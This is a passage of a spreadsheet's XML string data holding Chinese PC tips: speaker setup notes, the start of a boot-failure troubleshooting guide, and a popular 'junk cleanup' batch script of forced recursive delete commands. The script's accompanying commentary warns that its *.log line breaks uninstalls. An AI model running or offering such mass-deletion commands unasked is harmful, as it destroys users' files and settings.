        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>31</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）而如果使用的是普通立体声（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>声道）音源，请将“输入方式”选择开关拨到（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>声道）一侧，此时组成的是虚拟</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统，环绕音箱放虚拟环绕声，音源可从线路输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口输入。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第三、放音。插上电源，把主音量调节旋钮调至适当的位置，打开电源开关，根据你的需求来调节低音音量旋钮，即可享受到漫步者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>R4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统的音乐魅力。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>提示：放音时请使用适当的音量聆听，因为过大的声音可能会损伤你的听觉系统或破坏音响系统。当音源的输出信号较大时，开大音量，可能会出现失真，所以你可把音源的输出音量和本系统的音量调节到适当的位置。环绕声道的音量也不宜过大，过大的环绕声也将影响听音效果，此外当作为虚拟</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统放音时，音箱的环绕音量会自动变小</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>......</t>
    </r>
  </si>
  <si>
    <t>关于网上流行的 “清理系统垃圾文件代码”</t>
  </si>
  <si>
    <t>echo 正在清理系统垃圾文件，请稍等......</t>
  </si>
  <si>
    <t>del /f /s /q %systemdrive%\*.tmp</t>
  </si>
  <si>
    <t>del /f /s /q %systemdrive%\*._mp</t>
  </si>
  <si>
    <t>del/f/s/q%systemdrive%\*.log</t>
  </si>
  <si>
    <t>del /f /s /q %systemdrive%\*.gid</t>
  </si>
  <si>
    <t>del /f /s /q %systemdrive%\*.chk</t>
  </si>
  <si>
    <t>del /f /s /q %systemdrive%\*.old</t>
  </si>
  <si>
    <t>del /f /s /q %systemdrive%\recycled\*.*</t>
  </si>
  <si>
    <t>del /f /s /q %windir%\*.bak</t>
  </si>
  <si>
    <t>del /f /s /q %windir%\prefetch\*.*</t>
  </si>
  <si>
    <t>rd /s /q %windir%\temp &amp; md %windir%\temp</t>
  </si>
  <si>
    <t>del /f /q %userprofile%\cookies\*.*</t>
  </si>
  <si>
    <t>del /f /q %userprofile%\recent\*.*</t>
  </si>
  <si>
    <t>del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"</t>
  </si>
  <si>
    <t>del /f /s /q "%userprofile%\Local Settings\Temp\*.*"</t>
  </si>
  <si>
    <t>del /f /s /q "%userprofile%\recent\*.*"</t>
  </si>
  <si>
    <t>echo 清理系统垃圾完成！</t>
  </si>
  <si>
    <t>echo. &amp; pause</t>
  </si>
  <si>
    <t>　　这是“清除系统垃圾（让你电脑速度像飞一样）”的链接，我知道这个批处理文件确实很好用，但是作者忽略了一个很重要的问题，导致很多电脑出现了一点不大不小的麻烦。希望菜鸟们在使用这个程序的时候能够注意一下。</t>
  </si>
  <si>
    <t>　　del/f/s/q%systemdrive%\*.log就是这行命令，我们可以看到，是删除后缀为log的文件，殊不知，在安装很多游戏或其他软件的时候，会生成一个install.log的文件，该文件记录了安装程序复制了哪些文件，用于日后卸载该程序，可是执行了del/f/s/q%systemdrive%\*.log后，会不分青红皂白地把所有的LOG文件删除，这样在添加/删除程序里卸载程序时，就会显示“无法找到install.log文件，无法执行卸载”。</t>
  </si>
  <si>
    <t>　　所以，请各位一定要把“del/f/s/q%systemdrive%\*.log”这一行给去掉。要不然就会出现卸载难的问题。</t>
  </si>
  <si>
    <t>电脑不启动故障诊治全攻略</t>
  </si>
  <si>
    <t>电脑启动的过程</t>
  </si>
  <si>
    <r>
      <t>　　在诸多电脑故障中，无法正常启动是最令用户头痛的事了。本文将以家用电脑和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>windows98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作系统为基础，介绍电脑无法正常启动故障的诊治。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　要想准确地诊断电脑不启动故障，首先要了解的起动过程，当我们按下电源开关时，电源就开始向主板和其它设备供电，此时电压还没有完全稳定，主板控制芯片组会根据</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主频设置向</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发出一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Reset(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号，让</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>初始化，电压完全稳定后，芯片组会撤去</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Reset</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>马上从地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FFFF0H</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>处执行一条跳转指令，跳到系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中真正的启动代码处。系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首先要做的事情就是进行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>POST(Power On Self Test</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，加电自检</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的主要任务是检测系统中的一些关键设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯片、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯片、定时器芯片、数据收发逻辑电路、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DMA</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器、中断控制器以及基本的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>64K</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存和内存刷新电路等</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是否存在和能否正常工作，如内存和显卡等。　　</t>
    </r>
  </si>
  <si>
    <t>　　根据故障现象诊治</t>
  </si>
  <si>
    <r>
      <t>　　现象一：系统完全不能启动，见不到电源指示灯亮，也听不到冷却风扇的声音。这时，基本可以认定是电源部分故障，检查：电源线和插座是否有电、主板电源插头是否连好，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>UPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是否正常供电，再确认电源是否有故障，最简单的就是替换法，但一般用户家中不可能备有电源等备件，这时可以尝试使用下面的方法：</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　先把硬盘，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇，或者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CDROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连好，然后把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主板电源插头用一根导线连接两个插脚（把插头的一侧突起对着自己，上层插脚从左数第</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个和下层插脚从右数第</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个，方向一定要正确），然后把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源的开关打开，如果电源风扇转动，说明电源正常，否则电源损坏。如果电源没问题直接短接主板上电源开关的跳线，如果正常，说明机箱面板的电源开关损坏。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　现象二：电源批示灯亮，风扇转，但没有明显的系统动作。这种情况如果出现在新组装电脑上应该首先检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是否插牢或更换</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，而正在使用的电脑的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>损坏的情况比较少见（人为损坏除外），损坏时一般多带有焦糊味，如果刚刚升级了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或者遭遇了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CIH</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>病毒攻击，这要考虑</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>损坏问题（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>莫名其妙的损坏也是有的），修复</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的方法很多杂志都介绍过就不重复了；确认</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>没问题后，就要考虑</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置问题，如果</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主频设置不正确也会出现这种故障，解决方法就是将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信息清除，既要将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放电，一般主板上都有一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放电的跳线，如果找不到这个跳线可以将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电池取下来，放电时间不要低于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分钟，然后将跳线恢复原状或重新安装好电池即可；如果</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>都没问题还要考虑电源问题：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机电源有一个特殊的输出信号，称为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>POWER GOOD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PG</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）信号，如果</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PG</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号的低电平持续时间不够或没有低电平时间，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机将无法启动。如果</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PG</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号一直为低电平，则</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机系统始终处于复位状态。这时</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机也出现黑屏、无声响等死机现象。但这需要专业的维修工具外加一些维修经验，因此，建议采用替换法；电源没有问题就要检查是否有短路，确保主板表面不和金属（特别是机箱的安装固定点）接触。把主板和电源拿出机箱，放在绝缘体表面，如果能启动，说明主板有短路现象；如果还是不能启动则要考虑主板问题，主板故障较为复杂，可以使用替换法确认，然后更换主板。</t>
    </r>
  </si>
  <si>
    <t>现象三：电源指示灯亮，系统能启动，但系统在初始化时停住了，而且可以听到嗽叭的鸣叫声（没有视频）：根据峰鸣代码可以判断出故障的部位。</t>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Award BIOS</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短声：说明系统正常启动。表明机器没有问题。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短声：说明</t>
    </r>
    <r>
      <rPr>
